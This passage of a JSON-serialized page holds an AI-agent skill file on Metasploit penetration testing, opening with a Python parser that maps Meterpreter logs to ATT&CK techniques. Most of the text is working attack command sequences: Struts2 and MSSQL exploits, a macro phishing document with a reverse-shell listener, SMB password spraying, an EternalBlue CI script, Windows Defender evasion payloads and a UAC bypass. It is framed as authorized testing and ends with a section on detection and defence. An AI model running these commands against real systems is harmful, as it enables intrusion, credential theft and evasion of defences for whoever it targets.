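[2026-01-16 15:42:01] meterpreter > run post/multi/manage/autoroute CMD=add SUBNET=10.10.30.0 NETMASK=255.255.255.0
[2026-01-16 15:42:20] meterpreter > background
[2026-01-16 15:42:30] msf6 > sessions -K
"""


def classify(module, verb):
    """Return the ATTACK key for an action, or None for bookkeeping commands."""
    if verb not in ACTIONS:
        return None
    m = module or ""
    if verb == "getsystem" or "/local/" in m:
        return "privilege_escalation"
    if verb == "download":
        return "collection"
    if verb in ("shell", "execute"):
        return "execution"
    if "hashdump" in m or "/credentials/" in m:
        return "credential_access"
    if "persistence" in m:
        return "persistence"
    if any(k in m for k in ("autoroute", "psexec", "socks_proxy")):
        return "lateral_movement"  # grouped under lateral movement as on this page
    if m.startswith("exploit/"):
        return "initial_access"
    return None


def parse_audit_log(text):
    """Turn a transcript into audit records: when, from where, against what, which technique."""
    events, opts, session_target = [], {"RHOSTS": None, "PAYLOAD": None, "LHOST": None}, None
    for line in text.splitlines():
        s = SESSION_RE.search(line)
        if s:
            session_target = s["dst"]
            events.append({"ts": s["ts"], "context": f"session {s['sid']}", "command": "session opened",
                           "source": s["src"], "target": f"{s['dst']}:{s['dport']}",
                           "payload": opts["PAYLOAD"], "tactic": None, "technique": None})
            continue
        m = PROMPT_RE.match(line)
        if not m:
            continue
        parts = m["cmd"].split()
        if not parts:
            continue
        verb = parts[0]
        module = f"{m['kind']}/{m['mod']}" if m["mod"] else None
        if verb in ("use", "run") and len(parts) > 1:
            module = parts[1]
        if verb == "set" and len(parts) > 2 and parts[1] in opts:
            opts[parts[1]] = parts[2]
        key = classify(module, verb)
        tactic, technique = ATTACK[key] if key else (None, None)
        events.append({"ts": m["ts"], "context": "meterpreter" if m["met"] else (module or "msf6"),
                       "command": m["cmd"], "source": opts["LHOST"],
                       "target": session_target if m["met"] else opts["RHOSTS"],
                       "payload": opts["PAYLOAD"], "tactic": tactic, "technique": technique})
    return events


def technique_summary(events):
    """Count tagged actions per technique ID for the report."""
    return Counter(e["technique"] for e in events if e["technique"])


if __name__ == "__main__":
    records = parse_audit_log(SAMPLE_LOG)
    for e in records:
        print(f"{e['ts']}  {(e['technique'] or '-'):6}  {e['target'] or '-':18}  {e['command']}")
    print(dict(technique_summary(records)))
```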
Patterns","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 1: Web Application Exploitation","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"msf6 > use exploit/multi/http/apache_struts2_content_type_ognl\nmsf6 exploit(...) > set RHOSTS \u003cweb-server>\nmsf6 exploit(...) > set TARGETURI /vulnerable-app\nmsf6 exploit(...) > set PAYLOAD linux/x64/meterpreter/reverse_tcp\nmsf6 exploit(...) > exploit","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 2: Database Server Exploitation","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# SQL Server exploitation\nmsf6 > use exploit/windows/mssql/mssql_payload\nmsf6 exploit(mssql_payload) > set RHOSTS \u003csql-server>\nmsf6 exploit(mssql_payload) > set USERNAME sa\nmsf6 exploit(mssql_payload) > set PASSWORD \u003cpassword>\nmsf6 exploit(mssql_payload) > exploit","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 3: Phishing Campaign Delivery","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Generate malicious document\nmsf6 > use exploit/windows/fileformat/office_word_macro\nmsf6 exploit(office_word_macro) > set FILENAME report.docm\nmsf6 exploit(office_word_macro) > set PAYLOAD windows/meterpreter/reverse_https\nmsf6 exploit(office_word_macro) > set LHOST \u003ccallback-server>\nmsf6 exploit(office_word_macro) > exploit\n\n# Set up listener\nmsf6 > use exploit/multi/handler\nmsf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_https\nmsf6 exploit(multi/handler) > set LHOST \u003ccallback-server>\nmsf6 exploit(multi/handler) > set LPORT 443\nmsf6 exploit(multi/handler) > exploit -j","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 4: Credential 
Spraying","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# One password per round across the target list; read the domain lockout policy first and\n# stay below its threshold (use USER_FILE instead of SMBUser when many accounts are in play)\nmsf6 > use auxiliary/scanner/smb/smb_login\nmsf6 auxiliary(scanner/smb/smb_login) > set RHOSTS file:/path/to/targets.txt\nmsf6 auxiliary(scanner/smb/smb_login) > set SMBUser Administrator\nmsf6 auxiliary(scanner/smb/smb_login) > set SMBPass \u003ccommon-password>\nmsf6 auxiliary(scanner/smb/smb_login) > set STOP_ON_SUCCESS true\nmsf6 auxiliary(scanner/smb/smb_login) > run","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Integration Points","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"CI/CD Integration","type":"text"}]},{"type":"paragraph","content":[{"text":"Automated vulnerability validation in security pipelines:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Headless Metasploit resource script\n# Fail early if the pipeline did not provide the target and callback addresses\n: \"${TARGET_IP:?TARGET_IP is not set}\" \"${CALLBACK_IP:?CALLBACK_IP is not set}\"\n\n# The unquoted EOF delimiter lets the shell expand ${TARGET_IP} and ${CALLBACK_IP} while\n# the file is written; msfconsole does not expand shell variables in resource scripts\ncat > exploit_validation.rc \u003c\u003cEOF\nworkspace -a ci-validation\nuse exploit/windows/smb/ms17_010_eternalblue\nset RHOSTS ${TARGET_IP}\nset PAYLOAD windows/x64/meterpreter/reverse_tcp\nset LHOST ${CALLBACK_IP}\nexploit -z\nsessions -K\nexit\nEOF\n\n# Run headless validation\nmsfconsole -q -r exploit_validation.rc -o validation_results.txt","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Security Tools Integration","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Nmap Integration","type":"text","marks":[{"type":"strong"}]},{"text":": Import reconnaissance data with ","type":"text"},{"text":"db_import","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Cobalt Strike","type":"text","marks":[{"type":"strong"}]},{"text":": Export sessions to Cobalt Strike 
beacons","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Empire","type":"text","marks":[{"type":"strong"}]},{"text":": Handoff sessions to PowerShell Empire framework","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"BloodHound","type":"text","marks":[{"type":"strong"}]},{"text":": Combine with Active Directory enumeration","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Burp Suite","type":"text","marks":[{"type":"strong"}]},{"text":": Integrate web vulnerability findings","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"MITRE ATT&CK Mapping","type":"text"}]},{"type":"paragraph","content":[{"text":"Map Metasploit activities to ATT&CK framework:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Initial Access","type":"text","marks":[{"type":"strong"}]},{"text":": T1190 (Exploit Public-Facing Application)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Execution","type":"text","marks":[{"type":"strong"}]},{"text":": T1059 (Command and Scripting Interpreter)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Persistence","type":"text","marks":[{"type":"strong"}]},{"text":": T1547 (Boot or Logon Autostart Execution)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Privilege Escalation","type":"text","marks":[{"type":"strong"}]},{"text":": T1068 (Exploitation for Privilege Escalation)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Credential Access","type":"text","marks":[{"type":"strong"}]},{"text":": T1003 (OS Credential Dumping)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Lateral 
Movement","type":"text","marks":[{"type":"strong"}]},{"text":": T1021 (Remote Services)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Collection","type":"text","marks":[{"type":"strong"}]},{"text":": T1005 (Data from Local System)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Exfiltration","type":"text","marks":[{"type":"strong"}]},{"text":": T1041 (Exfiltration Over C2 Channel)","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Troubleshooting","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Issue: Session Dies Immediately","type":"text"}]},{"type":"paragraph","content":[{"text":"Causes","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Antivirus detection of payload","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Incompatible payload architecture (x86 vs x64)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Firewall blocking callback connection","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Solutions","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Try evasion techniques\nmsf6 > use evasion/windows/windows_defender_exe\nmsf6 evasion(...) > set PAYLOAD windows/meterpreter/reverse_https\nmsf6 evasion(...) 
> set FILENAME evaded_payload.exe\nmsf6 evasion(...) > run\n# Evasion modules are run, not generated; the executable is written under ~/.msf4/local/\n\n# Try the other payload flavor: a staged payload fetches the Meterpreter stage from the\n# handler, a stageless one carries it inline, and the two are detected differently\nset PAYLOAD windows/meterpreter/reverse_https # staged\n# vs\nset PAYLOAD windows/meterpreter_reverse_https # stageless\n\n# Migrate immediately after session establishment\nmeterpreter > run post/windows/manage/migrate","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Issue: Exploit Fails with \"Exploit completed, but no session was created\"","type":"text"}]},{"type":"paragraph","content":[{"text":"Causes","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Target not vulnerable","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Incorrect target version or architecture","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Payload compatibility issue","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Solutions","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Verify target vulnerability\nmsf6 exploit(...) > check\n\n# Adjust target manually\nmsf6 exploit(...) > show targets\nmsf6 exploit(...) > set TARGET \u003ctarget-index>\n\n# Try alternative payload\nmsf6 exploit(...) > show payloads\nmsf6 exploit(...) 
> set PAYLOAD \u003calternative-payload>","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Issue: Cannot Escalate Privileges","type":"text"}]},{"type":"paragraph","content":[{"text":"Solutions","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Enumerate escalation opportunities\nmeterpreter > run post/multi/recon/local_exploit_suggester\n\n# Try alternative techniques\nmeterpreter > getsystem -t 1 # Named Pipe Impersonation\nmeterpreter > getsystem -t 2 # Named Pipe Impersonation (Admin Drop)\nmeterpreter > getsystem -t 3 # Token Duplication\n\n# Use UAC bypass if applicable\nmeterpreter > background\nmsf6 > use exploit/windows/local/bypassuac_injection\nmsf6 exploit(bypassuac_injection) > set SESSION \u003csession-id>\nmsf6 exploit(bypassuac_injection) > exploit","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Defensive Considerations","type":"text"}]},{"type":"paragraph","content":[{"text":"Organizations can detect Metasploit activity by:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Network IDS","type":"text","marks":[{"type":"strong"}]},{"text":": Signature-based detection of default Metasploit payloads","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Endpoint Detection","type":"text","marks":[{"type":"strong"}]},{"text":": Behavioral analysis of meterpreter process injection","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Traffic Analysis","type":"text","marks":[{"type":"strong"}]},{"text":": Unusual outbound HTTPS connections to non-standard ports","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Memory Forensics","type":"text","marks":[{"type":"strong"}]},{"text":": Detection of reflective DLL injection 
techniques","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Log Analysis","type":"text","marks":[{"type":"strong"}]},{"text":": Unusual authentication patterns or process execution","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Enhance defensive posture:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Deploy endpoint detection and response (EDR) solutions","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Enable PowerShell script block logging","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Monitor for unusual parent-child process relationships","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Implement application whitelisting","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Detect lateral movement with network segmentation and monitoring","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"References","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Metasploit Documentation","type":"text","marks":[{"type":"link","attrs":{"href":"https://docs.metasploit.com/","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Metasploit Unleashed","type":"text","marks":[{"type":"link","attrs":{"href":"https://www.offsec.com/metasploit-unleashed/","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"MITRE ATT&CK Framework","type":"text","marks":[{"type":"link","attrs":{"href":"https://attack.mitre.org/","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Penetration Testing Execution Standard 
(PTES)","type":"text","marks":[{"type":"link","attrs":{"href":"http://www.pentest-standard.org/","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"OWASP Testing Guide","type":"text","marks":[{"type":"link","attrs":{"href":"https://owasp.org/www-project-web-security-testing-guide/","title":null}}]}]}]}]},{"type":"hr","attrs":{"markup":"---"}}]},"metadata":{"date":"2026-06-05","name":"pentest-metasploit","tags":["pentest","metasploit","exploitation","post-exploitation","vulnerability-validation","red-team"],"author":"@skillopedia","source":{"stars":336,"repo_name":"marketplace","origin_url":"https://github.com/aiskillstore/marketplace/blob/HEAD/skills/agentsecops/pentest-metasploit/SKILL.md","repo_owner":"aiskillstore","body_sha256":"aa5becff74d588924b5140b90f082ae9f1faa3bd10075b8a0f9fba47dc64b49f","cluster_key":"694ac08bc0f9475e441808e66bfd59e41bffe88f0fe3646a8dcdd19b21ed5381","clean_bundle":{"format":"clean-skill-bundle-v1","source":"aiskillstore/marketplace/skills/agentsecops/pentest-metasploit/SKILL.md","attachments":[{"id":"bca9d815-d9b8-5b0e-8b7a-61a221a39397","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/bca9d815-d9b8-5b0e-8b7a-61a221a39397/attachment.yml","path":"assets/ci-config-template.yml","size":11105,"sha256":"0fc554799a0e03a44883990f208f2a428f3c1e70eed1a9bcfbc01e728962b91e","contentType":"application/yaml; charset=utf-8"},{"id":"17ec0958-98f6-58c6-9698-a905aad16104","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/17ec0958-98f6-58c6-9698-a905aad16104/attachment.yaml","path":"assets/rule-template.yaml","size":11044,"sha256":"cb228a390bcd3745cafb1783c6337d9106ae179e853935ae19c90caac10a0497","contentType":"application/yaml; 
charset=utf-8"},{"id":"87b538d0-7853-5867-ae67-d9012501115d","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/87b538d0-7853-5867-ae67-d9012501115d/attachment.md","path":"references/EXAMPLE.md","size":15672,"sha256":"d830809dec44c82770c5ef0fe12831754f113931dc739891a1ec8186aefc629f","contentType":"text/markdown; charset=utf-8"},{"id":"c626912e-5b69-5db0-abab-bac9d9197485","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/c626912e-5b69-5db0-abab-bac9d9197485/attachment.md","path":"references/WORKFLOW_CHECKLIST.md","size":8390,"sha256":"f667c8d5c6e5c50b491643d644082ff202a6bb94476e0e7b648c6d0e5c8a080f","contentType":"text/markdown; charset=utf-8"},{"id":"704dfdee-9ce3-587b-a3ff-c153749906c0","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/704dfdee-9ce3-587b-a3ff-c153749906c0/attachment.json","path":"skill-report.json","size":29293,"sha256":"f20ccdff57cadb8b86506da199425c7be334c23d880923c49fdf1c6149018942","contentType":"application/json; charset=utf-8"}],"bundle_sha256":"553586da1863fa2bfbaeef10943de28240ec553786a94bb4149165d11e13cd39","attachment_count":5,"text_attachments":5,"attachment_storage":"skillopedia-attachments-v1","binary_attachments":0,"excluded_attachments":[]},"cluster_size":1,"skill_md_path":"skills/agentsecops/pentest-metasploit/SKILL.md","import_metadata":{"date":"2026-06-05","author":"@skillopedia","version":"v1","category":"testing-qa","category_label":"Testing"},"exact_dupes_collapsed_into_this":0},"version":"v1","category":"testing-qa","frameworks":["MITRE-ATT&CK","OWASP","PTES"],"import_tag":"clean-skills-v1","maintainer":"[email protected]","references":["https://docs.metasploit.com/","https://www.offsec.com/metasploit-unleashed/","https://attack.mitre.org/"],"description":"Penetration testing framework for exploit development, vulnerability validation, and authorized security assessments using Metasploit Framework. 
Use when: (1) Validating vulnerabilities in authorized security assessments, (2) Demonstrating exploit impact for security research, (3) Testing defensive controls in controlled environments, (4) Conducting authorized penetration tests with proper scoping and authorization, (5) Developing post-exploitation workflows for red team operations.\n","dependencies":{"tools":["postgresql","nmap"],"packages":["metasploit-framework"]}}},"renderedAt":1782980857671}
